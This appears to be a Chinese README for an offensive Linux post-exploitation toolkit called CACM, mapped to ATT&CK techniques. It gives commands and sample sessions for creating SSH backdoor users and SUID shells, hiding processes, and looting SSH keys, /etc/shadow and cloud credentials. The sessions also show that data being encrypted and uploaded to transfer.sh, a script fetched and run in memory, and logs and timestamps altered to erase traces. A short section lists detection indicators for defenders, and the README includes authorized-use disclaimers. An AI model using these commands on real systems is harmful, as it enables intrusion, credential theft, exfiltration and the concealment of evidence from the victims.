
# 列出所有后门用户
ssh_backdoor list

# 删除后门用户
ssh_backdoor remove backup_user

# 隐藏用户（从who、w等命令中隐藏）
ssh_backdoor hide backup_user

# 测试SSH连接
ssh_backdoor test backup_user

# 配置SSH服务
ssh_backdoor config

suidshell - SUID Shell后门

功能: 创建SUID权限的shell后门，用于权限提升

ATT&CK: T1548.001 (滥用提升控制机制：Setuid和Setgid)

用法:

# 创建SUID shell后门
suidshell create /tmp/.shell

# 删除SUID shell后门
suidshell delete /tmp/.shell

# 列出现有的SUID shell
suidshell list

portmux - 端口复用

功能: 实现端口复用，在现有服务端口上建立隐蔽通道

ATT&CK: T1090.001 (内部代理)

用法:

# 设置端口复用（将22端口复用为4444）
portmux setup 22 4444 secret_trigger

# 激活端口复用
portmux activate target.com:22 secret_trigger

# 停用端口复用
portmux deactivate target.com:22 secret_trigger

# 测试端口复用
portmux test target.com 22 secret_trigger

historydel - 历史命令清理

功能: 删除shell历史命令记录，清除操作痕迹

ATT&CK: T1070.003 (指标移除：清除命令历史)

用法:

# 删除指定行范围的历史命令
historydel 100-200

# 删除包含特定关键词的历史命令
historydel keyword "password"

# 清空整个历史文件
historydel clear

# 删除最近N条命令
historydel last 50

sshmon - SSH监控和数据传输

功能: 监控SSH连接和数据传输，记录SSH会话内容

ATT&CK: T1040 (网络嗅探)

用法:

# 启动SSH监控
sshmon start

# 启动监控并指定输出文件
sshmon start --output /tmp/.ssh_logs

# 启动加密监控
sshmon start --encrypt secret_key

# 启动隐蔽模式监控
sshmon start --stealth --silent

# 查看监控状态
sshmon status

# 查看监控日志
sshmon logs

# 查看最近日志
sshmon logs --tail

# 查看原始日志
sshmon logs --raw

# 解密查看日志
sshmon logs --decrypt secret_key

# 停止监控
sshmon stop

# 清理所有监控数据
sshmon clean

案例3: 数据收集与隐蔽传输

# 1. 全面凭据收集
CACM> loot
[*] Collecting credentials and secrets...
[🔑] SSH Keys:
[+] /home/alice/.ssh/id_rsa (2048-bit RSA)
[+] /root/.ssh/id_rsa (4096-bit RSA)
[🔐] Password Files:
[+] /etc/shadow (readable via sudo)
[+] /var/backups/passwd.bak
[🎫] API Keys & Tokens:
[+] /home/alice/.aws/credentials
[+] /opt/webapp/.env (DB_PASSWORD=secret123)

# 2. 高级秘密扫描
CACM> np /etc/ /home/ /opt/ | less -R
[🔍] Advanced scanning with Chinese support...
[+] /etc/mysql/my.cnf: password = mysql_secret_2024
[+] /home/bob/.bashrc: export API_KEY=sk-1234567890abcdef
[+] /opt/app/config.ini: 数据库密码 = chinese_secret_123

# 3. 搜索特定文件
CACM> find_subdomains company.com /var/log /etc
[+] Found in /etc/nginx/sites-available/default:
    api.company.com
    admin.company.com
    internal.company.com

# 4. 搜索敏感信息
CACM> hgrep password /var/log/ /etc/ /home/
[📁] /var/log/mysql/error.log
   Line 245: Access denied for user 'backup'@'localhost' (using password: YES)
[📁] /etc/apache2/.htpasswd
   Line 1: admin:$apr1$xyz$encrypted_password_hash

# 5. 加密敏感数据
CACM> enc /home/alice/.ssh/id_rsa
[*] Encrypting with AES-256-GCM...
[+] Encrypted: /home/alice/.ssh/id_rsa.enc
CACM> enc /etc/shadow
[*] Encrypting system file...
[+] Encrypted: /tmp/.shadow.enc

# 6. 隐蔽传输数据
CACM> transfer /tmp/.shadow.enc --service transfer.sh --encrypt
[*] Double-encrypting for transfer...
[*] Uploading via transfer.sh...
[+] Upload successful!
[*] URL: https://transfer.sh/abc123/encrypted_data
[*] Auto-expires in: 14 days

# 7. 清理痕迹
CACM> shred -u /home/alice/.ssh/id_rsa
[+] Original key securely deleted
CACM> xlog /var/log/auth.log "192.168.1.100"
[*] Removed 23 lines containing attacker IP
CACM> xlog --systemd --service ssh
[*] Cleared SSH service logs (2.1MB removed)

# 8. 时间戳伪装
CACM> notime_cp /etc/passwd /tmp/.backup_passwd
[*] Copied with full timestamp preservation
CACM> ctime /tmp/.shadow.enc
[*] Set ctime to match mtime (appears older)

案例4: 网络代理与隐蔽通信

# 1. 建立TCP代理
CACM> xbounce :8080 internal.company.com:3306
[*] TCP proxy: 0.0.0.0:8080 -> internal.company.com:3306
[+] Proxy established for database access

# 2. 使用幽灵IP进行扫描
CACM> xghostip 10.255.255.255 192.168.1.0/24 -scan
[*] Using non-existing source IP: 10.255.255.255
[*] Stealth scanning target network...
[+] Responses captured via raw sockets

# 3. 隐蔽SSH连接
CACM> xssh [email protected] --stealth
[*] Establishing stealth SSH connection...
[*] Disabling host key checking...
[*] Suppressing connection logs...
[+] Connected without leaving traces

# 4. 隐蔽文件传输
CACM> xscp --stealth /tmp/tools.tar.gz [email protected]:/tmp/.cache/
[*] Stealth SCP transfer initiated...
[*] Transfer completed: 15.2MB in 3.2s
[*] No logs generated on target system

# 5. 内存执行工具
CACM> dl https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | memexec
[*] Downloading linpeas.sh...
[*] Executing directly in memory...
[*] No disk artifacts created
[+] Memory execution completed

案例5: 高级反取证技术

# 1. 时间戳操作
CACM> notime /etc/passwd "touch /tmp/backdoor.sh"
[*] Executing at /etc/passwd timestamp...
[*] System time: 2024-01-10 08:30:15
[+] Backdoor created with legitimate timestamp

# 2. 全面日志清理
CACM> xlog /var/log/auth.log "Failed password.*192\.168\.1\.100"
[*] Removing failed login attempts...
[+] Cleaned 15 authentication failures

CACM> xlog /var/log/apache2/access.log "192\.168\.1\.100"
[*] Removing web access logs...
[+] Cleaned 234 access log entries

CACM> xlog --systemd --since "2024-01-15 10:00:00"
[*] Clearing recent systemd logs...
[+] Removed 5.2MB of recent system logs

# 3. 安全文件删除
CACM> shred -n 7 -u /tmp/sensitive_data.txt
[*] 7-pass secure deletion...
[+] File completely unrecoverable

# 4. 进程隐藏验证
CACM> hide status
[*] Hidden processes:
  PID: 15234 - socat (hidden from: ps, top, htop, pgrep)
  PID: 16789 - nc (hidden from: ps, top, htop, pgrep)
[+] 2 processes successfully hidden

📋 完整命令速查表

信息收集类

命令	功能	ATT&CK	示例
`sub`	子域名发现	T1590.005	`sub example.com`
`ws`	系统信息收集	T1082	`ws -v -o info.txt`
`scan`	端口扫描	T1046	`scan 192.168.1.0/24 -p 22,80,443`
`dns`	DNS查询	T1590.005	`dns example.com MX`
`rdns`	反向DNS查询	T1590.005	`rdns 192.168.1.0/24`
`xpty`	终端用户发现	T1033	`xpty -v`
`edr`	安全产品检测	T1518.001	`edr --type av`

文件操作类

命令	功能	ATT&CK	示例
`wfind`	可写目录查找	T1083	`wfind /tmp /var`
`hgrep`	高级文本搜索	T1083	`hgrep password /etc/`
`find_subdomains`	文件中搜索子域名	T1083	`find_subdomains company.com`
`enc`	文件加密	T1027	`enc secret.txt`
`dec`	文件解密	T1027	`dec secret.txt.enc`
`shred`	安全删除	T1070.004	`shred -u sensitive.txt`
`np`	高级秘密扫描	T1552.001	`np /etc/ \| less -R`
`loot`	凭据收集	T1552.001	`loot --passwords`

网络工具类

命令	功能	ATT&CK	示例
`dl`	多协议下载	T1071.001	`dl https://example.com/file.txt`
`xbounce`	TCP流量转发	T1090.001	`xbounce :8080 target.com:80`
`xghostip`	幽灵IP操作	T1090.003	`xghostip 10.0.0.1 target.com`
`xssh`	隐蔽SSH连接	T1021.004	`xssh user@host --stealth`
`xscp`	隐蔽文件传输	T1021.004	`xscp --stealth file.txt user@host:/tmp/`
`transfer`	文件上传服务	T1041	`transfer file.txt --service transfer.sh`

进程管理类

命令	功能	ATT&CK	示例
`hide`	进程隐藏	T1055	`hide 1234`
`tit`	用户输入监控	T1056.001	`tit read 1234`
`memexec`	内存执行	T1055	`memexec /usr/bin/id`
`xsu`	用户切换	T1134.001	`xsu root "id"`

系统维持类

命令	功能	ATT&CK	示例
`xhome`	隐藏工作目录	T1564.001	`xhome /tmp/.workspace`
`xtmux`	隐藏tmux会话	T1564.001	`xtmux new -s hidden`
`bin`	工具下载	T1105	`bin nmap curl jq`
`lpe`	权限提升检测	T1068	`lpe --fast`
`ssh_backdoor`	SSH后门用户	T1136.001	`ssh_backdoor create backup_user`
`suidshell`	SUID shell后门	T1548.001	`suidshell create /tmp/.shell`
`portmux`	端口复用	T1090.001	`portmux setup 22 4444`
`sshmon`	SSH监控	T1040	`sshmon start`

时间戳操作类

命令	功能	ATT&CK	示例
`notime`	时间戳伪装执行	T1070.006	`notime /etc/passwd "touch file"`
`ctime`	修改创建时间	T1070.006	`ctime /tmp/file`
`notime_cp`	时间戳保持复制	T1070.006	`notime_cp source.txt dest.txt`

日志清理类

命令	功能	ATT&CK	示例
`xlog`	日志清理	T1070.003	`xlog /var/log/auth.log "pattern"`
`historydel`	历史命令清理	T1070.003	`historydel 100-200`

实用工具类

命令	功能	ATT&CK	示例
`common`	常用命令集合	T1083	`common lt /var/log`

🔧 环境变量配置

HS_TOKEN - 加密密钥

# 设置加密密钥
export HS_TOKEN="your_secret_key_here"

# 使用环境变量加密
echo "sensitive data" | enc

# 使用环境变量解密
cat encrypted_file.enc | dec

CACM_HOME - 工作目录

# 设置CACM工作目录
export CACM_HOME="/tmp/.cacm_workspace"

# 工具会自动使用该目录存储临时文件

⚠️ 注意事项

1. 合法使用

仅限授权测试: 本工具仅用于授权的渗透测试和安全研究
遵守法律法规: 请严格遵守当地法律法规，不得用于非法活动
获得明确授权: 使用前必须获得目标系统所有者的明确书面授权
记录测试活动: 建议详细记录所有测试活动，便于后续分析和报告

2. 权限要求

Root权限功能: 以下功能需要root权限
- notime - 时间戳伪装执行
- ctime - 修改文件创建时间
- notime_cp - 完整时间戳复制
- hide - 进程隐藏（部分功能）
- xlog --systemd - systemd日志清理
普通用户功能: 大部分功能可在普通用户权限下运行
权限提升: 可使用 lpe 命令检测权限提升机会

3. 环境兼容性

主要支持: Linux系统（Ubuntu, CentOS, Debian, RHEL等）
部分支持: macOS（某些功能可能受限）
不支持: Windows系统（建议使用WSL）
架构支持: x86_64, ARM64

4. 检测规避

隐蔽模式: 多数命令提供隐蔽选项（如 --stealth）
进程隐藏: hide 命令可隐藏关键进程
日志清理: xlog 命令可清理操作痕迹
时间戳伪装: 时间戳操作命令可伪装文件创建时间
⚠️ 注意: 无法保证100%隐蔽，高级EDR可能仍会检测

5. 数据安全

加密强度: 使用AES-256-GCM加密算法
密钥管理: 妥善保管 HS_TOKEN 环境变量
密钥丢失: 丢失密钥将无法恢复加密数据
安全删除: 使用 shred 命令安全删除敏感文件

6. 网络安全

代理使用: 建议通过代理或VPN使用网络功能
流量加密: 网络传输尽量使用加密协议
IP伪装: 可使用 xghostip 进行IP地址伪装
连接隐蔽: SSH/SCP命令提供隐蔽连接选项

7. 性能影响

资源消耗: 某些功能（如大规模扫描）可能消耗大量系统资源
网络带宽: 文件传输和下载功能会占用网络带宽
磁盘空间: 工具下载和日志记录需要足够磁盘空间
建议: 在测试环境中先验证性能影响

8. 故障排除

权限错误: 检查是否有足够权限执行特定功能
网络问题: 确认网络连接和防火墙设置
依赖缺失: 某些功能可能需要系统依赖包
版本兼容: 确保系统版本与工具兼容

� 应急响应指南

检测到CACM工具的迹象

如果您是系统管理员或安全分析师，以下是检测CACM工具使用的指标：

1. 文件系统指标

# 查找可疑的隐藏目录
find /tmp /dev/shm -name ".*" -type d 2>/dev/null

# 查找可疑的二进制文件
find /tmp /dev/shm -name "*cacm*" -o -name "*CACM*" 2>/dev/null

# 检查最近修改的可执行文件
find /tmp /dev/shm -type f -executable -mtime -1 2>/dev/null

2. 进程监控

# 检查可疑进程
ps aux | grep -E "(socat|nc|ncat)" | grep -v grep

# 检查隐藏的tmux会话
ls -la /tmp/tmux-* 2>/dev/null

# 监控系统调用
strace -p <suspicious_pid> 2>&1 | grep -E "(ptrace|process_vm_readv)"

3. 网络监控

# 检查可疑网络连接
netstat -tulpn | grep -E ":(4444|8080|1080)"

# 监控DNS查询
tcpdump -i any port 53 | grep -E "(crt\.sh|ip\.thc\.org)"

# 检查代理连接
lsof -i | grep -E "(LISTEN|ESTABLISHED)" | grep -v ":22\|:80\|:443"

4. 日志分析

# 检查认证日志中的异常
grep -E "(Failed password|Invalid user)" /var/log/auth.log | tail -20

# 检查系统日志中的时间异常
journalctl --since "1 hour ago" | grep -E "(time|clock)"

# 检查文件访问日志
ausearch -f /etc/passwd -f /etc/shadow 2>/dev/null

清理和恢复

# 终止可疑进程
pkill -f "socat\|nc\|ncat"

# 清理临时文件
rm -rf /tmp/.*cacm* /dev/shm/.*workspace* 2>/dev/null

# 恢复系统时间（如果被修改）
ntpdate -s time.nist.gov

# 重置文件权限
chmod 644 /etc/passwd /etc/group
chmod 600 /etc/shadow

�📚 参考资源

官方资源

安全框架

技术文档

学习资源

🤝 贡献指南

报告问题

在GitHub上创建Issue
详细描述问题和复现步骤
提供系统环境信息
附上相关日志或截图

功能建议

检查是否已有类似建议
详细描述功能需求
说明使用场景和价值
考虑安全和合规性影响

代码贡献

Fork项目仓库
创建功能分支
编写代码和测试
提交Pull Request
等待代码审查

📄 许可证

本项目采用MIT许可证，详见LICENSE文件。

🔒 免责声明

重要提醒:

合法使用: 本工具仅供安全研究和授权渗透测试使用
使用者责任: 使用者需对自己的行为承担全部法律责任
开发者免责: 开发者不承担任何因误用或滥用本工具而产生的法律责任
授权要求: 使用前必须获得目标系统所有者的明确书面授权
教育目的: 本工具主要用于安全教育和防御能力提升

使用本工具即表示您已阅读、理解并同意遵守上述条款。

最后更新: 2025年7月28日 版本: v1.0 作者: RuoJi6